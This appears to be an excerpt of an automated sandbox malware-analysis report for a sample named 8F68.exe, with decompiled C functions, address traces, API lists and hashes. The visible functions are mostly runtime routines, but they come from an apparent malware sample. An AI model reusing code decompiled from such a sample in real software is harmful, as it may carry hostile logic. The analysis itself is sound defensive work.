                                                0x00c26bf2
                                                0x00c26bf5
                                                0x00c26bf8
                                                0x00c26bfe
                                                0x00c26c00
                                                0x00c26c07
                                                0x00c26c11
                                                0x00c26c13
                                                0x00c26c16
                                                0x00c26c19
                                                0x00c26c1c
                                                0x00c26c1f
                                                0x00c26c22
                                                0x00c26c28
                                                0x00c26f33
                                                0x00c26f33
                                                0x00000000
                                                0x00c26c2e
                                                0x00c26c36
                                                0x00c26c39
                                                0x00c26c3f
                                                0x00c26c42
                                                0x00c26c49
                                                0x00c26c50
                                                0x00c26c53
                                                0x00000000
                                                0x00000000
                                                0x00c26c5c
                                                0x00c26c61
                                                0x00c26c63
                                                0x00c26c66
                                                0x00c26c6b
                                                0x00c26c6f
                                                0x00000000
                                                0x00000000
                                                0x00000000
                                                0x00c26c6f
                                                0x00c26c74
                                                0x00c26c76
                                                0x00c26c7b
                                                0x00c26d35
                                                0x00c26d3c
                                                0x00c26d3d
                                                0x00c26d40
                                                0x00c26d42
                                                0x00c26ee6
                                                0x00c26ee8
                                                0x00000000
                                                0x00c26eea
                                                0x00c26eea
                                                0x00c26eed
                                                0x00c26efc
                                                0x00c26f00
                                                0x00c26f01
                                                0x00c26f01
                                                0x00000000
                                                0x00c26f05
                                                0x00c26d48
                                                0x00c26d4a
                                                0x00c26d50
                                                0x00c26d53
                                                0x00c26d5f
                                                0x00c26d68
                                                0x00c26d73
                                                0x00c26d78
                                                0x00c26d7b
                                                0x00c26d7e
                                                0x00000000
                                                0x00c26d84
                                                0x00c26d84
                                                0x00000000
                                                0x00c26d84
                                                0x00c26d7e
                                                0x00c26c81
                                                0x00c26c90
                                                0x00c26c91
                                                0x00c26c94
                                                0x00c26c97
                                                0x00c26c9c
                                                0x00c26eb2
                                                0x00c26eb4
                                                0x00c26eb6
                                                0x00c26eb8
                                                0x00c26ec2
                                                0x00c26eca
                                                0x00c26ecc
                                                0x00c26ecd
                                                0x00c26ed1
                                                0x00c26ed4
                                                0x00c26ed4
                                                0x00c26ed8
                                                0x00c26ed8
                                                0x00c26ed8
                                                0x00c26edb
                                                0x00c26edb
                                                0x00c26edb
                                                0x00c26edd
                                                0x00c26edd
                                                0x00c26ee1
                                                0x00c26ca2
                                                0x00c26ca2
                                                0x00c26ca5
                                                0x00c26ca7
                                                0x00c26caa
                                                0x00c26cad
                                                0x00c26cb1
                                                0x00c26cb2
                                                0x00c26cb6
                                                0x00c26cb9
                                                0x00c26cbe
                                                0x00c26cc8
                                                0x00c26ccd
                                                0x00c26cd0
                                                0x00c26cd3
                                                0x00c26cd3
                                                0x00c26cd6
                                                0x00c26cd9
                                                0x00c26cdb
                                                0x00c26ce4
                                                0x00c26ce8
                                                0x00c26ce9
                                                0x00c26ced
                                                0x00c26cf3
                                                0x00c26cfc
                                                0x00c26d09
                                                0x00c26d10
                                                0x00c26d14
                                                0x00c26d1f
                                                0x00c26d24
                                                0x00c26d2a
                                                0x00000000
                                                0x00c26d30
                                                0x00c26d87
                                                0x00c26d88
                                                0x00c26e0b
                                                0x00c26e12
                                                0x00c26e1a
                                                0x00c26e22
                                                0x00c26e27
                                                0x00c26e2a
                                                0x00c26e2f
                                                0x00000000
                                                0x00c26e35
                                                0x00c26e4a
                                                0x00c26f2a
                                                0x00c26f30
                                                0x00000000
                                                0x00c26e50
                                                0x00c26e59
                                                0x00c26e5b
                                                0x00c26e61
                                                0x00000000
                                                0x00c26e67
                                                0x00c26e6b
                                                0x00c26ea1
                                                0x00c26ea4
                                                0x00000000
                                                0x00c26eaa
                                                0x00c26eaa
                                                0x00000000
                                                0x00c26eaa
                                                0x00c26e6d
                                                0x00c26e6f
                                                0x00c26e71
                                                0x00c26e8a
                                                0x00000000
                                                0x00c26e90
                                                0x00c26e94
                                                0x00000000
                                                0x00c26e9a
                                                0x00c26e9a
                                                0x00c26e9d
                                                0x00c26e9e
                                                0x00000000
                                                0x00c26e9e
                                                0x00c26e94
                                                0x00c26e8a
                                                0x00c26e6b
                                                0x00c26e61
                                                0x00c26e4a
                                                0x00c26e2f
                                                0x00c26d2a
                                                0x00c26c9c
                                                0x00000000
                                                0x00c26d8c
                                                0x00c26d8c
                                                0x00c26d90
                                                0x00c26d93
                                                0x00c26db5
                                                0x00c26db8
                                                0x00c26dbd
                                                0x00c26dc1
                                                0x00c26dc5
                                                0x00c26df3
                                                0x00c26df5
                                                0x00000000
                                                0x00c26dc7
                                                0x00c26dc7
                                                0x00c26dca
                                                0x00c26dcd
                                                0x00c26dd0
                                                0x00c26f07
                                                0x00c26f0a
                                                0x00c26f0d
                                                0x00c26f17
                                                0x00c26f22
                                                0x00c26f27
                                                0x00000000
                                                0x00c26dd6
                                                0x00c26ddd
                                                0x00c26de2
                                                0x00c26de5
                                                0x00c26de8
                                                0x00000000
                                                0x00c26dee
                                                0x00c26dee
                                                0x00000000
                                                0x00c26dee
                                                0x00c26de8
                                                0x00c26dd0
                                                0x00c26d95
                                                0x00c26d99
                                                0x00c26d9c
                                                0x00c26da1
                                                0x00c26da7
                                                0x00c26da9
                                                0x00c26db0
                                                0x00c26df6
                                                0x00c26df9
                                                0x00c26dfa
                                                0x00c26dff
                                                0x00c26e02
                                                0x00c26e05
                                                0x00000000
                                                0x00000000
                                                0x00000000
                                                0x00000000
                                                0x00c26e05
                                                0x00000000
                                                0x00c26d93
                                                0x00c26c2e
                                                0x00c26f36
                                                0x00c26f36
                                                0x00c26f38
                                                0x00c26f3b
                                                0x00c26f3b
                                                0x00c26f3b
                                                0x00c26f3b
                                                0x00c26f4d
                                                0x00c26f4f
                                                0x00c26f50
                                                0x00c26f51
                                                0x00c26f5b

                                                APIs
                                                • GetConsoleOutputCP.KERNEL32(00000000,00000000,?), ref: 00C26BF8
                                                • __fassign.LIBCMT ref: 00C26DDD
                                                • __fassign.LIBCMT ref: 00C26DFA
                                                • WriteFile.KERNEL32(?,?,00000000,?,00000000,?,?,?,?,?,?,?,?,?,?,00000000), ref: 00C26E42
                                                • WriteFile.KERNEL32(?,?,00000001,?,00000000), ref: 00C26E82
                                                • GetLastError.KERNEL32(?,?,?,?,?,?,?,?,?,?,00000000), ref: 00C26F2A
                                                Memory Dump Source
                                                • Source File: 0000000C.00000002.443436477.0000000000C11000.00000020.00000001.01000000.00000009.sdmp, Offset: 00C10000, based on PE: true
                                                • Associated: 0000000C.00000002.443279176.0000000000C10000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                • Associated: 0000000C.00000002.443765227.0000000000C34000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                • Associated: 0000000C.00000002.443923174.0000000000C42000.00000004.00000001.01000000.00000009.sdmpDownload File
                                                • Associated: 0000000C.00000002.444652620.0000000000C97000.00000040.00000001.01000000.00000009.sdmpDownload File
                                                • Associated: 0000000C.00000002.444675545.0000000000C98000.00000004.00000001.01000000.00000009.sdmpDownload File
                                                • Associated: 0000000C.00000002.444742097.0000000000C9A000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                Joe Sandbox IDA Plugin
                                                • Snapshot File: hcaresult_12_2_c10000_8F68.jbxd
                                                Yara matches
                                                Similarity
                                                • API ID: FileWrite__fassign$ConsoleErrorLastOutput
                                                • String ID:
                                                • API String ID: 1735259414-0
                                                • Opcode ID: 1ec41ebeeae905bcd3e1e6d4bd028a89907a19bb29137956714a9d3f11e2d5c9
                                                • Instruction ID: a6dd9fc6fdbd77152d510b9f486ee25b363676f41c131b8ed265340483b30aeb
                                                • Opcode Fuzzy Hash: 1ec41ebeeae905bcd3e1e6d4bd028a89907a19bb29137956714a9d3f11e2d5c9
                                                • Instruction Fuzzy Hash: EEC17C75D002A89FCF15CFE8E980AEDBBB5EF48314F28416AE855B7741D6319E42CB60
                                                Uniqueness

                                                Uniqueness Score: -1.00%

                                                C-Code - Quality: 82%
                                                			E00C1A5CA(void* __ecx) {
                                                				void* _t8;
                                                				void* _t11;
                                                				void* _t13;
                                                				void* _t14;
                                                				void* _t18;
                                                				void* _t23;
                                                				long _t24;
                                                				void* _t27;
                                                
                                                				_t13 = __ecx;
                                                				if( *0xc42040 != 0xffffffff) {
                                                					_t24 = GetLastError();
                                                					_t11 = E00C1B7D3(_t13,  *0xc42040);
                                                					_t14 = _t23;
                                                					if(_t11 == 0xffffffff) {
                                                						L5:
                                                						_t11 = 0;
                                                					} else {
                                                						if(_t11 == 0) {
                                                							if(E00C1B80E(_t14,  *0xc42040, 0xffffffff) != 0) {
                                                								_push(0x28);
                                                								_t27 = E00C1B913();
                                                								_t18 = 1;
                                                								if(_t27 == 0) {
                                                									L8:
                                                									_t11 = 0;
                                                									E00C1B80E(_t18,  *0xc42040, 0);
                                                								} else {
                                                									_t8 = E00C1B80E(_t18,  *0xc42040, _t27);
                                                									_pop(_t18);
                                                									if(_t8 != 0) {
                                                										_t11 = _t27;
                                                										_t27 = 0;
                                                									} else {
                                                										goto L8;
                                                									}
                                                								}
                                                								E00C1CD40(_t27);
                                                							} else {
                                                								goto L5;
                                                							}
                                                						}
                                                					}
                                                					SetLastError(_t24);
                                                					return _t11;
                                                				} else {
                                                					return 0;
                                                				}
                                                			}











                                                0x00c1a5ca
                                                0x00c1a5d1
                                                0x00c1a5e4
                                                0x00c1a5eb
                                                0x00c1a5ed
                                                0x00c1a5f1
                                                0x00c1a60a
                                                0x00c1a60a
                                                0x00c1a5f3
                                                0x00c1a5f5
                                                0x00c1a608
                                                0x00c1a60f
                                                0x00c1a618
                                                0x00c1a61b
                                                0x00c1a61e
                                                0x00c1a632
                                                0x00c1a632
                                                0x00c1a63b
                                                0x00c1a620
                                                0x00c1a627
                                                0x00c1a62d
                                                0x00c1a630
                                                0x00c1a644
                                                0x00c1a646
                                                0x00000000
                                                0x00000000
                                                0x00000000
                                                0x00c1a630
                                                0x00c1a649
                                                0x00000000
                                                0x00000000
                                                0x00000000
                                                0x00c1a608
                                                0x00c1a5f5
                                                0x00c1a651
                                                0x00c1a65b
                                                0x00c1a5d3
                                                0x00c1a5d5
                                                0x00c1a5d5

                                                APIs
                                                • GetLastError.KERNEL32(?,?,00C1A5C1,00C18B94,00C17CBE), ref: 00C1A5D8
                                                • ___vcrt_FlsGetValue.LIBVCRUNTIME ref: 00C1A5E6
                                                • ___vcrt_FlsSetValue.LIBVCRUNTIME ref: 00C1A5FF
                                                • SetLastError.KERNEL32(00000000,00C1A5C1,00C18B94,00C17CBE), ref: 00C1A651
                                                Memory Dump Source
                                                • Source File: 0000000C.00000002.443436477.0000000000C11000.00000020.00000001.01000000.00000009.sdmp, Offset: 00C10000, based on PE: true
                                                • Associated: 0000000C.00000002.443279176.0000000000C10000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                • Associated: 0000000C.00000002.443765227.0000000000C34000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                • Associated: 0000000C.00000002.443923174.0000000000C42000.00000004.00000001.01000000.00000009.sdmpDownload File
                                                • Associated: 0000000C.00000002.444652620.0000000000C97000.00000040.00000001.01000000.00000009.sdmpDownload File
                                                • Associated: 0000000C.00000002.444675545.0000000000C98000.00000004.00000001.01000000.00000009.sdmpDownload File
                                                • Associated: 0000000C.00000002.444742097.0000000000C9A000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                Joe Sandbox IDA Plugin
                                                • Snapshot File: hcaresult_12_2_c10000_8F68.jbxd
                                                Yara matches
                                                Similarity
                                                • API ID: ErrorLastValue___vcrt_
                                                • String ID:
                                                • API String ID: 3852720340-0
                                                • Opcode ID: cc8c8486acdc88ef1d6f66aa1be52058f224a70f7806a411efe24e9cc8c4e5ec
                                                • Instruction ID: cf29daa84ce9339b5ce077144a4cca331cde811edc7f6c4d5be64285c3bf2871
                                                • Opcode Fuzzy Hash: cc8c8486acdc88ef1d6f66aa1be52058f224a70f7806a411efe24e9cc8c4e5ec
                                                • Instruction Fuzzy Hash: 73012F3220E2116EB72826B57C867EF2B89EB137B1730023AF220620F2EF518CC0F545
                                                Uniqueness

                                                Uniqueness Score: -1.00%

                                                C-Code - Quality: 100%
                                                			E00C2A65A(intOrPtr* _a4, intOrPtr _a8, intOrPtr _a16) {
                                                				intOrPtr _t14;
                                                				intOrPtr _t15;
                                                				intOrPtr _t17;
                                                				intOrPtr _t36;
                                                				intOrPtr* _t38;
                                                				intOrPtr _t39;
                                                
                                                				_t38 = _a4;
                                                				if(_t38 != 0) {
                                                					__eflags =  *_t38;
                                                					if( *_t38 != 0) {
                                                						_t14 = E00C29B81(_a16, 0, _t38, 0xffffffff, 0, 0, 0, 0);
                                                						__eflags = _t14;
                                                						if(__eflags != 0) {
                                                							_t36 = _a8;
                                                							__eflags = _t14 -  *((intOrPtr*)(_t36 + 0xc));
                                                							if(_t14 <=  *((intOrPtr*)(_t36 + 0xc))) {
                                                								L10:
                                                								_t15 = E00C29B81(_a16, 0, _t38, 0xffffffff,  *((intOrPtr*)(_t36 + 8)),  *((intOrPtr*)(_t36 + 0xc)), 0, 0);
                                                								__eflags = _t15;
                                                								if(__eflags != 0) {
                                                									 *((intOrPtr*)(_t36 + 0x10)) = _t15 - 1;
                                                									_t17 = 0;
                                                									__eflags = 0;
                                                								} else {
                                                									E00C1D9F2(GetLastError());
                                                									_t17 =  *((intOrPtr*)(E00C1DA28(__eflags)));
                                                								}
                                                								L13:
                                                								L14:
                                                								return _t17;
                                                							}
                                                							_t17 = E00C204E4(_t36, _t14);
                                                							__eflags = _t17;
                                                							if(_t17 != 0) {
                                                								goto L13;
                                                							}
                                                							goto L10;
                                                						}
                                                						E00C1D9F2(GetLastError());
                                                						_t17 =  *((intOrPtr*)(E00C1DA28(__eflags)));
                                                						goto L14;
                                                					}
                                                					_t39 = _a8;
                                                					__eflags =  *((intOrPtr*)(_t39 + 0xc));
                                                					if( *((intOrPtr*)(_t39 + 0xc)) != 0) {
                                                						L5:
                                                						 *((char*)( *((intOrPtr*)(_t39 + 8)))) = 0;
                                                						_t17 = 0;
                                                						 *((intOrPtr*)(_t39 + 0x10)) = 0;
                                                						goto L14;
                                                					}
                                                					_t17 = E00C204E4(_t39, 1);
                                                					__eflags = _t17;
                                                					if(_t17 != 0) {
                                                						goto L14;
                                                					}
                                                					goto L5;
                                                				}
                                                				E00C20569(_a8);
                                                				return 0;
                                                			}









                                                0x00c2a660
                                                0x00c2a665
                                                0x00c2a679
                                                0x00c2a67c
                                                0x00c2a6ae
                                                0x00c2a6b6
                                                0x00c2a6b8
                                                0x00c2a6d1
                                                0x00c2a6d4
                                                0x00c2a6d7
                                                0x00c2a6e5
                                                0x00c2a6f4
                                                0x00c2a6fc
                                                0x00c2a6fe
                                                0x00c2a717
                                                0x00c2a71a
                                                0x00c2a71a
                                                0x00c2a700
                                                0x00c2a707
                                                0x00c2a712
                                                0x00c2a712
                                                0x00c2a71c
                                                0x00c2a71d
                                                0x00000000
                                                0x00c2a71d
                                                0x00c2a6dc
                                                0x00c2a6e1
                                                0x00c2a6e3
                                                0x00000000
                                                0x00000000
                                                0x00000000
                                                0x00c2a6e3
                                                0x00c2a6c1
                                                0x00c2a6cc
                                                0x00000000
                                                0x00c2a6cc
                                                0x00c2a67e
                                                0x00c2a681
                                                0x00c2a684
                                                0x00c2a697
                                                0x00c2a69a
                                                0x00c2a69c
                                                0x00c2a69e
                                                0x00000000
                                                0x00c2a69e
                                                0x00c2a68a
                                                0x00c2a68f
                                                0x00c2a691
                                                0x00000000
                                                0x00000000
                                                0x00000000
                                                0x00c2a691
                                                0x00c2a66a
                                                0x00000000

                                                Strings
                                                • C:\Users\user\AppData\Local\Temp\8F68.exe, xrefs: 00C2A65F
                                                Memory Dump Source
                                                • Source File: 0000000C.00000002.443436477.0000000000C11000.00000020.00000001.01000000.00000009.sdmp, Offset: 00C10000, based on PE: true
                                                • Associated: 0000000C.00000002.443279176.0000000000C10000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                • Associated: 0000000C.00000002.443765227.0000000000C34000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                • Associated: 0000000C.00000002.443923174.0000000000C42000.00000004.00000001.01000000.00000009.sdmpDownload File
                                                • Associated: 0000000C.00000002.444652620.0000000000C97000.00000040.00000001.01000000.00000009.sdmpDownload File
                                                • Associated: 0000000C.00000002.444675545.0000000000C98000.00000004.00000001.01000000.00000009.sdmpDownload File
                                                • Associated: 0000000C.00000002.444742097.0000000000C9A000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                Joe Sandbox IDA Plugin
                                                • Snapshot File: hcaresult_12_2_c10000_8F68.jbxd
                                                Yara matches
                                                Similarity
                                                • API ID:
                                                • String ID: C:\Users\user\AppData\Local\Temp\8F68.exe
                                                • API String ID: 0-3450837374
                                                • Opcode ID: 441fece865b9af8ab0f3c7ebaabccc28bebbf0107ef84717ebc9f51d314c7d0d
                                                • Instruction ID: 95fb5c88c33c8d5af94bfa4cf3b98aeb0f10f92cb0a35b2d2fa359f259d6f67c
                                                • Opcode Fuzzy Hash: 441fece865b9af8ab0f3c7ebaabccc28bebbf0107ef84717ebc9f51d314c7d0d
                                                • Instruction Fuzzy Hash: 02210871600225BFDB20AF79BC81DAB7BACEF413647108515F526D7952EB30ED40AB62
                                                Uniqueness

                                                Uniqueness Score: -1.00%

                                                C-Code - Quality: 25%
                                                			E00C21061(void* __ecx, intOrPtr _a4) {
                                                				signed int _v8;
                                                				_Unknown_base(*)()* _t8;
                                                				_Unknown_base(*)()* _t14;
                                                
                                                				_v8 = _v8 & 0x00000000;
                                                				_t8 =  &_v8;
                                                				__imp__GetModuleHandleExW(0, L"mscoree.dll", _t8, __ecx);
                                                				if(_t8 != 0) {
                                                					_t8 = GetProcAddress(_v8, "CorExitProcess");
                                                					_t14 = _t8;
                                                					if(_t14 != 0) {
                                                						 *0xc34138(_a4);
                                                						_t8 =  *_t14();
                                                					}
                                                				}
                                                				if(_v8 != 0) {
                                                					return FreeLibrary(_v8);
                                                				}
                                                				return _t8;
                                                			}






                                                0x00c21067
                                                0x00c2106b
                                                0x00c21076
                                                0x00c2107e
                                                0x00c21089
                                                0x00c2108f
                                                0x00c21093
                                                0x00c2109a
                                                0x00c210a0
                                                0x00c210a0
                                                0x00c210a2
                                                0x00c210a7
                                                0x00000000
                                                0x00c210ac
                                                0x00c210b3

                                                APIs
                                                • GetModuleHandleExW.KERNEL32(00000000,mscoree.dll,00000000,?,?,00C21013,?,?,00C20FD8,?,?,?), ref: 00C21076
                                                • GetProcAddress.KERNEL32(00000000,CorExitProcess), ref: 00C21089
                                                • FreeLibrary.KERNEL32(00000000,?,?,00C21013,?,?,00C20FD8,?,?,?), ref: 00C210AC
                                                Strings
                                                Memory Dump Source
                                                • Source File: 0000000C.00000002.443436477.0000000000C11000.00000020.00000001.01000000.00000009.sdmp, Offset: 00C10000, based on PE: true
                                                • Associated: 0000000C.00000002.443279176.0000000000C10000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                • Associated: 0000000C.00000002.443765227.0000000000C34000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                • Associated: 0000000C.00000002.443923174.0000000000C42000.00000004.00000001.01000000.00000009.sdmpDownload File
                                                • Associated: 0000000C.00000002.444652620.0000000000C97000.00000040.00000001.01000000.00000009.sdmpDownload File
                                                • Associated: 0000000C.00000002.444675545.0000000000C98000.00000004.00000001.01000000.00000009.sdmpDownload File
                                                • Associated: 0000000C.00000002.444742097.0000000000C9A000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                Joe Sandbox IDA Plugin
                                                • Snapshot File: hcaresult_12_2_c10000_8F68.jbxd
                                                Yara matches
                                                Similarity
                                                • API ID: AddressFreeHandleLibraryModuleProc
                                                • String ID: CorExitProcess$mscoree.dll
                                                • API String ID: 4061214504-1276376045
                                                • Opcode ID: da40a8c513911c7effa17c8bef8b4a569227807bccc29968216118bd06ee5481
                                                • Instruction ID: 1170b305386665bd2d3e842775477b78248f04f8e95df879363c3ad2a86ff57e
                                                • Opcode Fuzzy Hash: da40a8c513911c7effa17c8bef8b4a569227807bccc29968216118bd06ee5481
                                                • Instruction Fuzzy Hash: B5F0A731A10219FBDB259B51EC09B9D7AB4EF04756F140061FE04A1160CB709F40DB90
                                                Uniqueness

                                                Uniqueness Score: -1.00%

                                                C-Code - Quality: 72%
                                                			E00C220E8(void* __ebx, void* __ecx, signed int __edx, void* __edi, void* __esi, void* __eflags, intOrPtr _a4, signed int _a8, intOrPtr _a12) {
                                                				signed int _v8;
                                                				signed int _v12;
                                                				short _v270;
                                                				short _v272;
                                                				char _v528;
                                                				char _v700;
                                                				signed int _v704;
                                                				short _v706;
                                                				signed int _v708;
                                                				signed int _v712;
                                                				signed int _v716;
                                                				intOrPtr _v720;
                                                				signed int _v724;
                                                				intOrPtr _v728;
                                                				signed int* _v732;
                                                				signed int _v736;
                                                				signed int _v740;
                                                				signed int _v744;
                                                				intOrPtr _v772;
                                                				signed int _v784;
                                                				void* __ebp;
                                                				signed int _t156;
                                                				void* _t163;
                                                				signed int _t164;
                                                				signed int _t166;
                                                				signed int _t167;
                                                				intOrPtr _t168;
                                                				signed int _t171;
                                                				signed int _t173;
                                                				signed int _t174;
                                                				signed int _t177;
                                                				signed int _t179;
                                                				signed int _t182;
                                                				signed int _t183;
                                                				signed int _t185;
                                                				signed int _t186;
                                                				signed int _t202;
                                                				signed int _t204;
                                                				signed int _t206;
                                                				signed int _t210;
                                                				signed int _t212;
                                                				void* _t213;
                                                				signed int _t220;
                                                				intOrPtr* _t221;
                                                				char* _t228;
                                                				intOrPtr _t232;
                                                				intOrPtr* _t233;
                                                				signed int _t235;
                                                				signed int _t240;
                                                				signed int _t241;
                                                				intOrPtr _t246;
                                                				void* _t247;
                                                				void* _t250;
                                                				signed int _t252;
                                                				signed int _t254;
                                                				signed int _t257;
                                                				signed int* _t258;
                                                				short _t259;
                                                				signed int _t260;
                                                				void* _t262;
                                                				void* _t263;
                                                				void* _t264;
                                                
                                                				_t244 = __edx;
                                                				_t156 =  *0xc42014; // 0x4fdfcf70
                                                				_v8 = _t156 ^ _t260;
                                                				_push(__ebx);
                                                				_t212 = _a8;
                                                				_push(__esi);
                                                				_push(__edi);
                                                				_t246 = _a4;
                                                				_v736 = _t212;
                                                				_v732 = E00C23663(__ecx, __edx) + 0x278;
                                                				_t163 = E00C217D3(_t212, __edx, _t246, _a12, _a12,  &_v272, 0x83,  &_v700, 0x55,  &_v716);
                                                				_t263 = _t262 + 0x18;
                                                				if(_t163 == 0) {
                                                					L39:
                                                					_t164 = 0;
                                                					__eflags = 0;
                                                					goto L40;
                                                				} else {
                                                					_t10 = _t212 + 2; // 0x6
                                                					_t252 = _t10 << 4;
                                                					_t166 =  &_v272;
                                                					_v712 = _t252;
                                                					_t244 =  *(_t252 + _t246);
                                                					_t220 = _t244;
                                                					while(1) {
                                                						_v704 = _v704 & 0x00000000;
                                                						_t254 = _v712;
                                                						if( *_t166 !=  *_t220) {
                                                							break;
                                                						}
                                                						if( *_t166 == 0) {
                                                							L6:
                                                							_t167 = _v704;
                                                						} else {
                                                							_t259 =  *((intOrPtr*)(_t166 + 2));
                                                							_v706 = _t259;
                                                							_t254 = _v712;
                                                							if(_t259 !=  *((intOrPtr*)(_t220 + 2))) {
                                                								break;
                                                							} else {
                                                								_t166 = _t166 + 4;
                                                								_t220 = _t220 + 4;
                                                								if(_v706 != 0) {
                                                									continue;
                                                								} else {
                                                									goto L6;
                                                								}
                                                							}
                                                						}
                                                						L8:
                                                						if(_t167 != 0) {
                                                							_t221 =  &_v272;
                                                							_t244 = _t221 + 2;
                                                							do {
                                                								_t168 =  *_t221;
                                                								_t221 = _t221 + 2;
                                                								__eflags = _t168 - _v704;
                                                							} while (_t168 != _v704);
                                                							_v708 = (_t221 - _t244 >> 1) + 1;
                                                							_t171 = E00C22FD9(4 + ((_t221 - _t244 >> 1) + 1) * 2);
                                                							_v724 = _t171;
                                                							__eflags = _t171;
                                                							if(_t171 == 0) {
                                                								goto L39;
                                                							} else {
                                                								_v720 =  *((intOrPtr*)(_t254 + _t246));
                                                								_v740 =  *(_t246 + 0xa0 + _t212 * 4);
                                                								_v744 =  *(_t246 + 8);
                                                								_t228 =  &_v272;
                                                								_v728 = _t171 + 4;
                                                								_t173 = E00C28361(_t171 + 4, _v708, _t228);
                                                								_t264 = _t263 + 0xc;
                                                								__eflags = _t173;
                                                								if(_t173 != 0) {
                                                									_t174 = _v704;
                                                									_push(_t174);
                                                									_push(_t174);
                                                									_push(_t174);
                                                									_push(_t174);
                                                									_push(_t174);
                                                									E00C1D97B();
                                                									asm("int3");
                                                									_push(_t260);
                                                									_push(_t228);
                                                									_v784 = _v784 & 0x00000000;
                                                									_t177 = E00C25763(_v772, 0x20001004,  &_v784, 2);
                                                									__eflags = _t177;
                                                									if(_t177 == 0) {
                                                										L49:
                                                										return 0xfde9;
                                                									}
                                                									_t179 = _v12;
                                                									__eflags = _t179;
                                                									if(_t179 == 0) {
                                                										goto L49;
                                                									}
                                                									return _t179;
                                                								} else {
                                                									__eflags = _v272 - 0x43;
                                                									 *((intOrPtr*)(_t254 + _t246)) = _v728;
                                                									if(_v272 != 0x43) {
                                                										L17:
                                                										_t182 = E00C214F0(_t212, _t246,  &_v700);
                                                										_t244 = _v704;
                                                									} else {
                                                										__eflags = _v270;
                                                										if(_v270 != 0) {
                                                											goto L17;
                                                										} else {
                                                											_t244 = _v704;
                                                											_t182 = _t244;
                                                										}
                                                									}
                                                									 *(_t246 + 0xa0 + _t212 * 4) = _t182;
                                                									__eflags = _t212 - 2;
                                                									if(_t212 != 2) {
                                                										__eflags = _t212 - 1;
                                                										if(_t212 != 1) {
                                                											__eflags = _t212 - 5;
                                                											if(_t212 == 5) {
                                                												 *((intOrPtr*)(_t246 + 0x14)) = _v716;
                                                											}
                                                										} else {
                                                											 *((intOrPtr*)(_t246 + 0x10)) = _v716;
                                                										}
                                                									} else {
                                                										_t258 = _v732;
                                                										 *(_t246 + 8) = _v716;
                                                										_v708 = _t258[8];
                                                										_t240 = _t258[9];
                                                										_v716 = _t240;
                                                										while(1) {
                                                											__eflags =  *(_t246 + 8) -  *(_t258 + _t244 * 8);
                                                											if( *(_t246 + 8) ==  *(_t258 + _t244 * 8)) {
                                                												break;
                                                											}
                                                											_t210 =  *(_t258 + _t244 * 8);
                                                											_t240 =  *(_t258 + 4 + _t244 * 8);
                                                											 *(_t258 + _t244 * 8) = _v708;
                                                											 *(_t258 + 4 + _t244 * 8) = _v716;
                                                											_t244 = _t244 + 1;
                                                											_t212 = _v736;
                                                											_v708 = _t210;
                                                											_v716 = _t240;
                                                											__eflags = _t244 - 5;
                                                											if(_t244 < 5) {
                                                												continue;
                                                											} else {
                                                											}
                                                											L25:
                                                											__eflags = _t244 - 5;
                                                											if(__eflags == 0) {
                                                												_t202 = E00C2802B(__eflags, _v704, 1, 0xc373f8, 0x7f,  &_v528,  *(_t246 + 8), 1);
                                                												_t264 = _t264 + 0x1c;
                                                												__eflags = _t202;
                                                												if(_t202 == 0) {
                                                													_t241 = _v704;
                                                												} else {
                                                													_t204 = _v704;
                                                													do {
                                                														 *(_t260 + _t204 * 2 - 0x20c) =  *(_t260 + _t204 * 2 - 0x20c) & 0x000001ff;
                                                														_t204 = _t204 + 1;
                                                														__eflags = _t204 - 0x7f;
                                                													} while (_t204 < 0x7f);
                                                													_t206 = E00C18D10( &_v528,  *0xc42184, 0xfe);
                                                													_t264 = _t264 + 0xc;
                                                													__eflags = _t206;
                                                													_t241 = 0 | _t206 == 0x00000000;
                                                												}
                                                												_t258[1] = _t241;
                                                												 *_t258 =  *(_t246 + 8);
                                                											}
                                                											 *(_t246 + 0x18) = _t258[1];
                                                											goto L37;
                                                										}
                                                										__eflags = _t244;
                                                										if(_t244 != 0) {
                                                											 *_t258 =  *(_t258 + _t244 * 8);
                                                											_t258[1] =  *(_t258 + 4 + _t244 * 8);
                                                											 *(_t258 + _t244 * 8) = _v708;
                                                											 *(_t258 + 4 + _t244 * 8) = _t240;
                                                										}
                                                										goto L25;
                                                									}
                                                									L37:
                                                									_t183 = _t212 * 0xc;
                                                									_t111 = _t183 + 0xc37480; // 0xc16870
                                                									 *0xc34138(_t246);
                                                									_t185 =  *((intOrPtr*)( *_t111))();
                                                									_t232 = _v720;
                                                									__eflags = _t185;
                                                									if(_t185 == 0) {
                                                										__eflags = _t232 - 0xc42258;
                                                										if(_t232 == 0xc42258) {
                                                											L44:
                                                											_t186 = _v712;
                                                										} else {
                                                											_t257 = _t212 + _t212;
                                                											__eflags = _t257;
                                                											asm("lock xadd [eax], ecx");
                                                											if(_t257 != 0) {
                                                												goto L44;
                                                											} else {
                                                												E00C22F9F( *((intOrPtr*)(_t246 + 0x28 + _t257 * 8)));
                                                												E00C22F9F( *((intOrPtr*)(_t246 + 0x24 + _t257 * 8)));
                                                												E00C22F9F( *(_t246 + 0xa0 + _t212 * 4));
                                                												_t186 = _v712;
                                                												_t235 = _v704;
                                                												 *(_t186 + _t246) = _t235;
                                                												 *(_t246 + 0xa0 + _t212 * 4) = _t235;
                                                											}
                                                										}
                                                										_t233 = _v724;
                                                										 *_t233 = 1;
                                                										_t164 =  *(_t186 + _t246);
                                                										 *((intOrPtr*)(_t246 + 0x28 + (_t212 + _t212) * 8)) = _t233;
                                                									} else {
                                                										 *((intOrPtr*)(_v712 + _t246)) = _t232;
                                                										E00C22F9F( *(_t246 + 0xa0 + _t212 * 4));
                                                										 *(_t246 + 0xa0 + _t212 * 4) = _v740;
                                                										E00C22F9F(_v724);
                                                										 *(_t246 + 8) = _v744;
                                                										goto L39;
                                                									}
                                                									goto L40;
                                                								}
                                                							}
                                                						} else {
                                                							_t164 = _t244;
                                                							L40:
                                                							_pop(_t247);
                                                							_pop(_t250);
                                                							_pop(_t213);
